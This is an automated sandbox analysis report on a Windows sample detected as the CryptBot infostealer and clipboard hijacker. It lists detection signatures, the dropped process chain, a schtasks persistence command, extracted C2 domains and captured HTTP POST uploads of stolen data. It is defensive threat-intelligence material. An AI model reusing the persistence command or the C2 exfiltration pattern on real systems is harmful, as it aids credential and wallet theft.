Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1537298
MD5:	bfe2f72aaf59ad12fe5479d4936d9d52
SHA1:	1eb38144e825af65babd0f1e5651f74123413c93
SHA256:	8ad7c506b6c146384ab9b6effd12c9bd586518100e35c4fcb4744b40d10bf25a
Tags:	exeuser-Bitsight
Infos:

Detection

Clipboard Hijacker, Cryptbot

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Clipboard Hijacker

Yara detected Cryptbot

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops large PE files

Found evasive API chain (may stop execution after checking mutex)

Found many strings related to Crypto-Wallets (likely being stolen)

Found stalling execution ending in API Sleep call

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Tries to harvest and steal browser information (history, passwords, etc)

Uses schtasks.exe or at.exe to add and modify task schedules

Contains capabilities to detect virtual machines

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to modify clipboard data

Contains functionality to query CPU information (cpuid)

Contains functionality to read the clipboard data

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\file.exe" MD5: BFE2F72AAF59AD12FE5479D4936D9D52)

service123.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\service123.exe" MD5: A91E6E8067DCF42DF58AFD7304BC3D32)

schtasks.exe (PID: 8000 cmdline: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 8008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

service123.exe (PID: 8052 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: A91E6E8067DCF42DF58AFD7304BC3D32)

service123.exe (PID: 2144 cmdline: C:\Users\user\AppData\Local\Temp\/service123.exe MD5: A91E6E8067DCF42DF58AFD7304BC3D32)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CryptBot	A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies, credit cards, and creates screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the c2.	No Attribution	https://any.run/cybersecurity-blog/cryptbot-infostealer-malware-analysis/ https://asec.ahnlab.com/en/24423/ https://asec.ahnlab.com/en/26052/ https://asec.ahnlab.com/en/31683/ https://asec.ahnlab.com/en/31802/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Malware Configuration

Threatname: Cryptbot

{"C2 list": ["@sevtbb17ht.top", "sevtbb17ht.top", "analforeverlovyu.top"]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2283603151.00000000046EA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 7416	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security
Process Memory Space: file.exe PID: 7416	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7416	JoeSecurity_Cryptbot	Yara detected Cryptbot	Joe Security
Process Memory Space: service123.exe PID: 7972	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
4.2.service123.exe.6c2b0000.1.unpack	JoeSecurity_Clipboard_Hijacker_5	Yara detected Clipboard Hijacker	Joe Security

Sigma Signatures

System Summary

Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7416, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f, ProcessId: 8000, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Suricata Signatures

ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-10-18T19:17:11.739200+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49734	103.80.87.67	80	TCP
2024-10-18T19:17:13.898449+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49735	103.80.87.67	80	TCP
2024-10-18T19:17:18.316764+0200	2054350	1	A Network Trojan was detected	192.168.2.4	49736	103.80.87.67	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: file.exe.7416.0.memstrmin

Malware Configuration Extractor: Cryptbot {"C2 list": ["@sevtbb17ht.top", "sevtbb17ht.top", "analforeverlovyu.top"]}

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 39%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00AC15B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		4_2_00AC15B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2B14B0 _open,_exit,_write,_close,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,CryptReleaseContext,		4_2_6C2B14B0

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Documents\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\Desktop\desktop.ini	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea ecx, dword ptr [esp+04h]	4_2_00AC81E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C32AEC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C32AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C32AF70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C2D0860
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C2DA970
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 2Ch	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C2DA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C2DA9E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C38F960h	4_2_6C2CEB10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C3584A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C2D44B4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C2DC510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C2DA580
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C2DA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+08h]	4_2_6C2DA5F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C2DE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C2DE6E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, ecx	4_2_6C350730
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C2D0740
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C32C040
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C32C1A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx+04h]	4_2_6C30A1E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [ecx]	4_2_6C2D0260
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [6C38D014h]	4_2_6C384360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C32BD10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push esi	4_2_6C327D10
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C323840
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+04h]	4_2_6C2DD974
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C2EBBDB
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C2EBBD7
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C32B4D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebp	4_2_6C2DD504
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_6C329600
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+0Ch]	4_2_6C2DD674
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then mov eax, 6C38DFF4h	4_2_6C323690
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then lea eax, dword ptr [ecx+08h]	4_2_6C2DD7F4
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push edi	4_2_6C353140
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C2CB1D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then sub esp, 1Ch	4_2_6C2DD2A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4x nop then push ebx	4_2_6C347350

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49736 -> 103.80.87.67:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49734 -> 103.80.87.67:80
Source: Network traffic	Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49735 -> 103.80.87.67:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: @sevtbb17ht.top
Source: Malware configuration extractor	URLs: sevtbb17ht.top
Source: Malware configuration extractor	URLs: analforeverlovyu.top

Source: Joe Sandbox View

ASN Name: SOLTIAES SOLTIAES

Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary33182410User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: sevtbb17ht.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary66532437User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 75801Host: sevtbb17ht.top
Source: global traffic	HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary80856451User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 29712Host: sevtbb17ht.top

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: sevtbb17ht.top

Source: unknown

HTTP traffic detected: POST /v1/upload.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=----Boundary33182410User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36Content-Length: 410Host: sevtbb17ht.top

Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: vinthoOIUgUISlONHmyI.dll.0.dr	String found in binary or memory: https://gcc.gnu.org/bugs/):
Source: file.exe, file.exe, 00000000.00000003.2306296995.000000006A367000.00000002.00001000.00020000.00000000.sdmp	String found in binary or memory: https://keruzam.com/update.php?compName=
Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: file.exe, 00000000.00000003.1839180331.00000000018BE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C2C9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,

4_2_6C2C9C22

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2C9C22 Sleep,GetClipboardSequenceNumber,OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		4_2_6C2C9C22
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2C9D11 OpenClipboard,GlobalAlloc,GlobalLock,strcpy,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		4_2_6C2C9D11

Source: C:\Users\user\AppData\Local\Temp\service123.exe

Code function: 4_2_6C2C9E27 GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_6C2C9E27

System Summary

Drops large PE files

Source: C:\Users\user\Desktop\file.exe

File dump: service123.exe.0.dr 314617856

Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00AC51B0	4_2_00AC51B0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_00AC3E20	4_2_00AC3E20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F2CCE	4_2_6C2F2CCE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2BCD00	4_2_6C2BCD00
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2BEE50	4_2_6C2BEE50
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2C0FC0	4_2_6C2C0FC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3749A0	4_2_6C3749A0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C300AC0	4_2_6C300AC0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2C44F0	4_2_6C2C44F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F46E0	4_2_6C2F46E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2E87C0	4_2_6C2E87C0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F07D0	4_2_6C2F07D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C300060	4_2_6C300060
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F2090	4_2_6C2F2090
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2E2360	4_2_6C2E2360
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C30DC70	4_2_6C30DC70
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2C5880	4_2_6C2C5880
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2E98F0	4_2_6C2E98F0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F7A20	4_2_6C2F7A20
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2FDBEE	4_2_6C2FDBEE
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2F140E	4_2_6C2F140E
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C301510	4_2_6C301510
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2FF610	4_2_6C2FF610
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2DF760	4_2_6C2DF760
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2B3000	4_2_6C2B3000
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C3750D0	4_2_6C3750D0
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: 4_2_6C2C70C0	4_2_6C2C70C0

Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C383B20 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C385980 appears 83 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C383560 appears 43 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C385A70 appears 77 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C383820 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C3836E0 appears 45 times
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Code function: String function: 6C37ADB0 appears 49 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@8/2@1/1

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\OsXmvlrkFI

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8008:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Mutant created: \Sessions\1\BaseNamedObjects\PmKvPAZEGlrvJpkkTgct

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\service123.exe

Jump to behavior

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe

ReversingLabs: Detection: 39%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\service123.exe C:\Users\user\AppData\Local\Temp\/service123.exe
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\service123.exe "C:\Users\user\AppData\Local\Temp\service123.exe"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /tn "ServiceData4" /tr "C:\Users\user\AppData\Local\Temp\/service123.exe" /st 00:01 /du 9800:59 /sc once /ri 1 /f	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe	Section loaded: cryptbase.dll	Jump to behavior
